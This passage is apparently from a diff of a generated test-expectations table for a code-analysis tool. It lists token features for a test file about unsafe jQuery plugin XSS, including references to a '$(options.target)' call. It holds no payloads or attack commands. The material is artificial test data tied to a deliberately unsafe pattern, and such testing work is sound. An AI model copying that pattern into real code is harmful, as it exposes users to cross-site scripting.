options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:4:121:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:4:121:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:4:121:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:7:121:16 | pluginName | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:7:121:16 | pluginName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:7:121:16 | pluginName | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:7:121:16 | pluginName | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:121:20 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:121:20 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:121:20 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:121:20 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | functio ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | functio ... T OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | functio ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | functio ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:21:123:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:30:121:38 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:30:121:38 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:30:121:38 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:30:121:38 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:40:121:46 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:40:121:46 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:40:121:46 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:40:121:46 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:40:121:46 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:40:121:46 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:40:121:46 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:40:121:46 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:19 | $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:19 | $(options.target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:19 | $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:19 | $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:19 | exceptional return of $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:19 | exceptional return of $(options.target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:19 | exceptional return of $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:3:122:19 | exceptional return of $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:5:122:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:5:122:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:5:122:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:5:122:11 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:5:122:18 | options.target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:5:122:18 | options.target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:5:122:18 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:5:122:18 | options.target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:5:122:18 | options.target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:5:122:18 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:13:122:18 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:13:122:18 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:13:122:18 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:122:13:122:18 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:125:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:125:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:125:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:125:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:125:9 | $.extend | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:125:9 | $.extend | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:125:9 | $.extend | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:125:9 | $.extend | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:129:3 | $.exten ... \\t\\t}\\n\\t}) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:129:3 | $.exten ... \\t\\t}\\n\\t}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:129:3 | $.exten ... \\t\\t}\\n\\t}) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:129:3 | $.exten ... \\t\\t}\\n\\t}) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:129:3 | exceptional return of $.exten ... \\t\\t}\\n\\t}) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:129:3 | exceptional return of $.exten ... \\t\\t}\\n\\t}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:129:3 | exceptional return of $.exten ... \\t\\t}\\n\\t}) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:2:129:3 | exceptional return of $.exten ... \\t\\t}\\n\\t}) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:4:125:9 | extend | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:4:125:9 | extend | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:4:125:9 | extend | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:4:125:9 | extend | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:11:125:11 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:11:125:11 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:11:125:11 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:11:125:11 | $ | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:11:125:14 | $.fn | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:11:125:14 | $.fn | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:11:125:14 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | @@ -23991,6 +156892,10 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:11:125:14 | $.fn | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:11:125:14 | $.fn | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:11:125:14 | $.fn | receiverName | $ | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:13:125:14 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:13:125:14 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:13:125:14 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:13:125:14 | fn | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:17:129:2 | {\\n\\t\\tmy_ ... \\n\\t\\t}\\n\\t} | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:17:129:2 | {\\n\\t\\tmy_ ... \\n\\t\\t}\\n\\t} | InputArgumentIndex | 1 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:17:129:2 | {\\n\\t\\tmy_ ... \\n\\t\\t}\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | @@ -23998,6 +156903,30 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:17:129:2 | {\\n\\t\\tmy_ ... \\n\\t\\t}\\n\\t} | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:17:129:2 | {\\n\\t\\tmy_ ... \\n\\t\\t}\\n\\t} | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:125:17:129:2 | {\\n\\t\\tmy_ ... \\n\\t\\t}\\n\\t} | receiverName | $ | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:126:11 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:126:11 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:126:11 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:126:11 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:128:3 | my_plug ... OK\\n\\t\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:128:3 | my_plug ... OK\\n\\t\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:128:3 | my_plug ... OK\\n\\t\\t} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:128:3 | my_plug ... OK\\n\\t\\t} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:128:3 | my_plug ... OK\\n\\t\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:128:3 | my_plug ... OK\\n\\t\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:128:3 | my_plug ... OK\\n\\t\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:3:128:3 | my_plug ... OK\\n\\t\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:126:13 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:126:13 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:126:13 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:126:13 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:126:14:128:3 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, 